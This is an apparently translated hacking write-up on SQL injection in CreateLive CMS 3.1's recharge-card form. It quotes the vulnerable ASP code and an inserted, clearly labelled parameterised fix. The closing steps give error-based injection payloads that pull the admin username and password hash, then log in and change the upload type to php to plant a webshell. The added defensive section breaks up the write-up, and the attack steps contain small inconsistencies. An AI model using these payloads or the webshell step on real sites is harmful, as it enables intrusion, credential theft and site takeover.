CreateLive CMS 3.1 Injection Vulnerability

Source: Internet
Author: User

I happened to read a February issue published by Black Hand and found a write-up of a CreateLive CMS 4.2 injection vulnerability, authored by Chaoyang. I have a CreateLive CMS system at hand, but its version is 3.1. I figured this hole should exist there too!

The site has open registration. Let's start!

The injectable file is user/User_UserCz.asp. In the chkCzNum function defined there, CzNum, CzUser and Pass are not filtered before being concatenated into the query string, which creates the injection vulnerability. Automated injection tools cannot guess it out, mainly because the form requires a verification code and is submitted via POST. The relevant code is as follows:


Sub chkCzNum()
    Dim CzUser, Self, CzNum, Pass
    Dim sPoint, sPointAll, sDayNum, sDayNumAll
    Dim rsUser, ChargeType
    ' Request() reads from the query string, form and cookies alike; nothing is filtered
    CzUser = Trim(Request("CzUser"))
    Self = Trim(Request("Self"))
    CzNum = Trim(Request("CzNum"))
    Pass = Trim(Request("Pass"))
    If CzNum = "" Or Pass = "" Then
        Call Cl.OutMsg("The recharge card number or recharge password cannot be blank!", "User_UserCz.asp")
    End If
    If Not Cl.CodeIsTrue(Trim(Request("ChkPlusCz")), "ChkPlusCz") Then
        Call Cl.OutMsg("Incorrect verification code", "User_UserCz.asp")
    End If
    Dim rsCz
    Set rsCz = Server.CreateObject("ADODB.RecordSet")
    ' CzNum and Pass are concatenated straight into the SQL text: this is the injection point
    OpenConn: rsCz.Open "Select * from Cl_UserCz where CzNum=" & CzNum & " and Pass=" & Pass & "", Conn, 1, 3
    If rsCz.BOF And rsCz.EOF Then
        rsCz.Close: Set rsCz = Nothing
        Call Cl.OutMsg("This recharge card does not exist or the password is incorrect. Please enter it again!", "User_UserCz.asp")
    End If
    sPoint = rsCz("Point")
    sDayNum = rsCz("DayNum")
    If rsCz("IsUser") <> 0 Then
        rsCz.Close: Set rsCz = Nothing
        Call Cl.OutMsg("This recharge card is already in use!", "User_UserCz.asp")
    End If
    ' ... (the rest of the Sub is not shown in the original)
End Sub
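The fix for this class of bug is to stop building the SQL text out of request values. The following is an added, hardened rewrite of chkCzNum written for this page; it is not CreateLive CMS code. It assumes the same Conn connection object, OpenConn routine and Cl helper object that the snippet above uses, that Cl.OutMsg ends the response (Exit Sub is added anyway so the function stays correct if it does not), and that CzNum and Pass are character columns no longer than 50 characters; the whitelist character sets and the helper IsValidToken are this example's own choices. The card values travel to SQL Server as bound ADO parameters, so a value such as "3 and 1=(select ...)" is compared as a literal card number and simply matches nothing.

```vbscript
' Added example, not part of CreateLive CMS: parameterised version of chkCzNum.
' Assumes Conn, OpenConn and Cl exist as in the original file.
Sub chkCzNumSafe()
    Dim CzNum, Pass, rsCz, cmd
    ' Read from the POSTed form only, not from Request() (query string/cookies too)
    CzNum = Trim(Request.Form("CzNum"))
    Pass  = Trim(Request.Form("Pass"))

    If CzNum = "" Or Pass = "" Then
        Call Cl.OutMsg("The recharge card number or recharge password cannot be blank!", "User_UserCz.asp")
        Exit Sub
    End If

    ' Whitelist validation (assumed formats): digits for the card number,
    ' alphanumerics for the card password. Spaces, quotes, parentheses and
    ' comment markers never reach the database layer.
    If Not IsValidToken(CzNum, "0123456789") Or _
       Not IsValidToken(Pass, "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz") Then
        Call Cl.OutMsg("Invalid recharge card number or password.", "User_UserCz.asp")
        Exit Sub
    End If

    If Not Cl.CodeIsTrue(Trim(Request.Form("ChkPlusCz")), "ChkPlusCz") Then
        Call Cl.OutMsg("Incorrect verification code", "User_UserCz.asp")
        Exit Sub
    End If

    ' Parameterised query: the values are bound, never concatenated into SQL text.
    OpenConn
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = Conn
    cmd.CommandType = 1   ' adCmdText
    cmd.CommandText = "SELECT Point, DayNum, IsUser FROM Cl_UserCz WHERE CzNum = ? AND Pass = ?"
    ' CreateParameter(name, type, direction, size, value): 200 = adVarChar, 1 = adParamInput
    cmd.Parameters.Append cmd.CreateParameter("@CzNum", 200, 1, 50, CzNum)
    cmd.Parameters.Append cmd.CreateParameter("@Pass", 200, 1, 50, Pass)
    Set rsCz = cmd.Execute

    If rsCz.BOF And rsCz.EOF Then
        rsCz.Close: Set rsCz = Nothing
        Call Cl.OutMsg("This recharge card does not exist or the password is incorrect. Please enter it again!", "User_UserCz.asp")
        Exit Sub
    End If
    If rsCz("IsUser") <> 0 Then
        rsCz.Close: Set rsCz = Nothing
        Call Cl.OutMsg("This recharge card is already in use!", "User_UserCz.asp")
        Exit Sub
    End If

    ' rsCz("Point") and rsCz("DayNum") can now be credited to the account,
    ' exactly as the original Sub goes on to do.
    rsCz.Close: Set rsCz = Nothing
    Set cmd = Nothing
End Sub

' Returns True when value is non-empty and every character is in allowed.
Function IsValidToken(value, allowed)
    Dim i
    IsValidToken = (Len(value) > 0)
    For i = 1 To Len(value)
        If InStr(allowed, Mid(value, i, 1)) = 0 Then IsValidToken = False
    Next
End Function
```

The parameter binding is the actual defence; the whitelist is an extra layer that also makes the "database error reveals the engine" behaviour described below impossible, because malformed card numbers are rejected before any query runs. With the card number rejected up front, the MSSQL conversion error that leaks data in the original code can no longer be triggered from this form.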

Click "recharge card" to open the form, enter the injection statement in the "recharge card number" field, and click "recharge".

An error is returned, from which the database can be confirmed to be MSSQL.

User data is stored in tables with the Cl_ prefix: cl_admin is the administrator table, whose fields include username and password, and cl_user is the user table with the same fields.

3 and 1 = (select username from cl_user where userid = 1); -- the name of the first user comes back: Admin.

3 and 1 = (select userpassword from cl_user where userid = 1); -- the MD5 hash of the Admin user's password comes back.

Log in with that username and password.

To get a webshell, the allowed upload file type can be changed to php.
